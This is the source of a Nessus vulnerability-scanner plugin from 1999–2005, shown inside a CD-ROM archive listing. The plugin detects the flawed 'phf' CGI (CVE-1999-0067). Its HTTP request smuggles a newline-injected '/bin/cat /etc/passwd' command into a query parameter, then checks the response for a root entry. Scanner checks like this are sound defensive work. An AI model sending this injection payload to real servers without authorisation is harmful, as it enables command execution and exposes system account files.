home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
modules
/
nessus-2.2.8.mo
/
usr
/
lib
/
nessus
/
plugins
/
phf.nasl
< prev
next >
Wrap
Text File
|
2005-01-14
|
2KB
|
78 lines
#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#
if(description)
{
script_id(10176);
script_bugtraq_id(629);
script_version ("$Revision: 1.22 $");
script_cve_id("CVE-1999-0067");
name["english"] = "phf";
name["francais"] = "phf";
script_name(english:name["english"], francais:name["francais"]);
desc["english"] = "The 'phf' CGI is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).
Solution : remove it from /cgi-bin.
Risk factor : High";
desc["francais"] = "Le cgi 'phf' est installΘ. Celui-ci possΦde
un problΦme de sΘcuritΘ bien connu qui permet α n'importe qui de faire
executer des commandes arbitraires au daemon http, avec les privilΦges
de celui-ci (root ou nobody).
Solution : retirez-le de /cgi-bin.
Facteur de risque : SΘrieux";
script_description(english:desc["english"], francais:desc["francais"]);
summary["english"] = "Checks for the presence of /cgi-bin/phf";
summary["francais"] = "VΘrifie la prΘsence de /cgi-bin/phf";
script_summary(english:summary["english"], francais:summary["francais"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
family["english"] = "CGI abuses";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes", "no404.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
foreach dir (cgi_dirs())
{
req = http_get(item:string(dir, "/phf?QALIAS=x%0a/bin/cat%20/etc/passwd"),
port:port);
r = http_keepalive_send_recv(port:port, data:req);
if( r == NULL ) exit(0);
if(egrep(pattern:".*root:.*:0:[01]:.*", string:r))
security_hole(port);
}